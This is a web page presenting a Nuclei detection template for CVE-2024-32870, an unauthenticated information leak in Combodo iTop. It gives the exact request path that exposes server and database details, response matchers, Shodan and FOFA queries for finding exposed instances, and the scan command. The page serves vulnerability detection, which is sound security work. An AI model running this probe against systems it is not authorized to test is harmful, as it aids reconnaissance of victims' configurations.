Skip to content

iTop Hub Connector - Information Disclosure

ID: CVE-2024-32870

Severity: medium

Author: DhiyaneshDk

Tags: cve,cve2024,itop,disclosure,unauth,exposure

Combodo iTop is a simple, web based IT Service Management tool. Server, OS, DBMS, PHP, and iTop info (name, version and parameters) can be read by anyone having access to iTop URI. This issue has been patched in versions 2.7.11, 3.0.5, 3.1.2, and 3.2.0.

id: CVE-2024-32870
info:
name: iTop Hub Connector - Information Disclosure
author: DhiyaneshDk
severity: medium
description: |
Combodo iTop is a simple, web based IT Service Management tool. Server, OS, DBMS, PHP, and iTop info (name, version and parameters) can be read by anyone having access to iTop URI. This issue has been patched in versions 2.7.11, 3.0.5, 3.1.2, and 3.2.0.
remediation: Users are advised to upgrade.There are no known workarounds for this vulnerability.
reference:
- https://www.synacktiv.com/en/advisories/multiple-vulnerabilities-on-itop
- https://github.com/Combodo/iTop/security/advisories/GHSA-rfjh-2f5x-qxmx
- https://nvd.nist.gov/vuln/detail/CVE-2024-32870
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.8
cve-id: CVE-2024-32870
cwe-id: CWE-200
epss-score: 0.00059
epss-percentile: 0.18723
cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:*
metadata:
vendor: combodo
product: itop
shodan-query: html:"iTop login"
fofa-query: body="iTop login"
tags: cve,cve2024,itop,disclosure,unauth,exposure
http:
- method: GET
path:
- "{{BaseURL}}/pages/exec.php?exec_module=itop-hub-connector&exec_page=launch.php&target=inform_after_setup"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'database_settings'
- 'database_version'
- 'database_settings'
- 'instance_host'
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502206600129dc06a14be8bda6dcfd4e557ce3045b061f116120b02228bb35942f00d022100dd3509f19f7d9075d30a7d5b654f8c98ab20e163e3808913982ae9adfc425818:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-32870.yaml"

View on Github